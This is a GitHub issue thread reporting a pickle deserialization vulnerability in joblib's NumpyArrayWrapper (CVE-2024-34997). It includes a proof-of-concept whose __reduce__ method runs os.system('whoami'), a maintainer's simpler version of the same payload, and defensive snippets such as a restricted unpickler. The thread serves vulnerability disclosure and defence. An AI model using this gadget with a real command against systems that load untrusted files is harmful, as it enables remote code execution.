an unsafe use of pickle #1582

Closed
K1ingzzz opened this issue May 6, 2024 · 2 comments

@K1ingzzz

K1ingzzz commented May 6, 2024

Python 3.9.13, joblib 1.4.2

joblib.numpy_pickle::NumpyArrayWrapper().read_array() uses pickle.load() to deserialize data, which may allow malicious code to execute locally. If the project runs on a public online server, this could enable a remote attack through a reverse shell.

PoC

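# test.py
import os
import pickle

import numpy
from joblib.numpy_pickle import NumpyArrayWrapper


class A:
    # On load, pickle calls the returned callable with the returned arguments
    def __reduce__(self):
        return (os.system, ('whoami',))


# Write the malicious pickle to disk
a = A()
with open('testnpyarray.pkl', 'wb') as file:
    pickle.dump(a, file)


class B:
    # Stand-in for the unpickler argument of read_array(); it supplies file_handle
    def __init__(self, file_handle):
        self.file_handle = file_handle


# An object dtype makes read_array() deserialize with pickle.load()
x = numpy.array([1, 'a', {}], dtype=object)
with open('testnpyarray.pkl', 'rb') as f:
    b = B(f)
    NumpyArrayWrapper(subclass='', shape=[], order='', dtype=x.dtype).read_array(b)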

Run python .\test.py and the shell displays your username, which is the output of the whoami command.
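
To see why loading triggers the command, the pickle stream can be inspected without executing it. The following is a minimal sketch using the standard-library pickletools module, assuming pickle protocol 4; the variable names are illustrative only. It shows that the stream names a callable and its argument and then contains a REDUCE opcode, which is the instruction that calls it at load time.

```python
import os
import pickle
import pickletools


class A:
    def __reduce__(self):
        return (os.system, ("whoami",))


# Serializing does not run the command; only loading would.
payload = pickle.dumps(A(), protocol=4)

# genops() walks the opcode stream without executing anything.
ops = list(pickletools.genops(payload))
opcode_names = [op.name for op, arg, pos in ops]
string_args = [arg for op, arg, pos in ops if isinstance(arg, str)]

print(opcode_names)
print(string_args)
```

The printed strings include the function name and the command, and the opcode list includes REDUCE, so anyone able to write the file controls what is called when it is loaded.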

@carnil

carnil commented May 18, 2024

This issue seems to have gotten CVE-2024-34997 assigned.

danigm added a commit to danigm/joblib that referenced this issue May 20, 2024
This patch adds a new optional argument to the read_array method to
enable pickle. By default the pickle load is disabled.

This is based on the actual code in numpy/lib/format.py:
numpy/numpy@a2bd3a7

Fix CVE-2024-34997, joblib#1582
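
For reference, the NumPy behaviour that the commit message points to can be observed through the public numpy.save / numpy.load API. This is a small sketch of NumPy's own allow_pickle switch, not of the proposed joblib patch: with allow_pickle=False, loading an object array is refused with a ValueError instead of being unpickled.

```python
import io

import numpy as np

# An object-dtype array can only be stored by pickling its elements.
obj_array = np.array([1, "a", {}], dtype=object)
buf = io.BytesIO()
np.save(buf, obj_array, allow_pickle=True)

# With pickling disabled, NumPy refuses to load the object array.
buf.seek(0)
try:
    np.load(buf, allow_pickle=False)
    refused = False
except ValueError as exc:
    refused = True
    print("refused:", exc)

# Opting in explicitly restores the array (and runs the unpickler).
buf.seek(0)
restored = np.load(buf, allow_pickle=True)
```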
@tomMoral
Contributor

Hello,

Thanks for the issue; however, I don't think it makes sense in the context of the joblib library.
Note that a similar issue has already been discussed in #977.

Here, the NumpyArrayWrapper is used internally to persist numpy arrays in the context of sharing objects between two processes/distributed experiments/caching.
One of joblib's goals is to allow the user to serialize any Python object to communicate tasks or results, or to cache results. To achieve this, we need to be as open as possible with our serialization and therefore use the pickle format.

IMO, an even simpler unsafe pattern is this:

import os
import pickle

class A:
    def __reduce__(self):
        return (os.system,('whoami',))
    
a=A()

with open('a.pkl','wb') as file:
    pickle.dump(a,file)
with open('a.pkl', 'rb') as file:
    pickle.load(file)

So why add an extra feature to avoid this in a nested case?
We are already making it clear that joblib.load should not be used for inter-user sharing on this page: https://joblib.readthedocs.io/en/stable/generated/joblib.load.html
We could maybe make the NumpyArrayWrapper private to make it clearer that it should not be used outside the parallel/caching context, if you think this is not clear enough (it is not exposed in the doc).
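
For readers who do need to read pickle data from another user, the Python standard library documents a way to restrict which globals an unpickler may resolve. The sketch below follows that pattern; it is not a joblib feature, and the names RestrictedUnpickler, restricted_loads and SAFE_BUILTINS are hypothetical. It reduces the attack surface but does not make pickle a safe interchange format.

```python
import builtins
import io
import os
import pickle

# Hypothetical allow-list: only these builtins may be resolved while loading.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream asks to import.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class A:
    def __reduce__(self):
        return (os.system, ("whoami",))


# The payload from this thread is rejected before os.system is ever called.
try:
    restricted_loads(pickle.dumps(A()))
    blocked = False
except pickle.UnpicklingError as exc:
    blocked = True
    print("blocked:", exc)

# Plain containers and allow-listed builtins still load.
benign = restricted_loads(pickle.dumps([1, 2, range(3)]))
```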

I am closing this issue for now but feel free to continue the discussion if you think I am missing some points.
